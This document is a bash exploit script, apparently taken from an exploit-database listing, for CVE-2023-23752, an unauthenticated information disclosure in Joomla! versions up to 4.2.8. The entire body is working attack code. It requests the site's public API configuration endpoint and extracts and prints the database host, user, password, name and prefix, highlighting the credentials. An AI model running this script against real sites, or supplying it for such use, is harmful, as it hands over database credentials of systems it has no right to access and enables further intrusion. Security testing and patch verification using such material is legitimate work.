Share
## https://sploitus.com/exploit?id=PACKETSTORM:178651
#!/bin/bash  
  
# Exploit Title: Joomla! <= 4.2.8 - Unauthenticated Information Disclosure  
  
# Date: 2024-05-21  
# CVE: CVE-2023-23752  
# Exploit Author: Miguel Redondo (aka d4t4s3c)  
# Vendor Homepage: https://www.joomla.org  
# Software Link: https://downloads.joomla.org  
# Version: <= 4.2.8  
# Tested on: Linux  
# Category: Web Application  
  
while getopts ":u:" arg; do  
case ${arg} in  
u) url=${OPTARG}; let parameter_counter+=1 ;;  
esac  
done  
  
if [ -z "${url}" ]; then  
echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"  
echo -e "\n[-] Usage: CVE-2023-23752.sh -u <url>\n"  
exit 1  
else  
echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"  
curl --silent --insecure "${url}/api/index.php/v1/config/application?public=true" > out.tmp  
echo -e "\n[i] Database info:\n"  
echo -e "[+] DB Type: $(sed -E 's/.*"dbtype":"([^"]+)".*/\1/' out.tmp)"  
echo -e "[+] DB Host: $(sed -E 's/.*"host":"([^"]+)".*/\1/' out.tmp)"  
echo -e "\e[92m[+] DB User: $(sed -E 's/.*"user":"([^"]+)".*/\1/' out.tmp)\e[0m"  
echo -e "\e[92m[+] DB Password: $(sed -E 's/.*"password":"([^"]+)".*/\1/' out.tmp)\e[0m"  
echo -e "[+] DB Name: $(sed -E 's/.*"db":"([^"]+)".*/\1/' out.tmp)"  
echo -e "[+] DB Prefix: $(sed -E 's/.*"dbprefix":"([^"]+)".*/\1/' out.tmp)"  
echo -e "[+] DB Encryptation: $(sed -E 's/.*"dbencryption":([0-9]+).*/\1/' out.tmp)\n"  
exit 0  
fi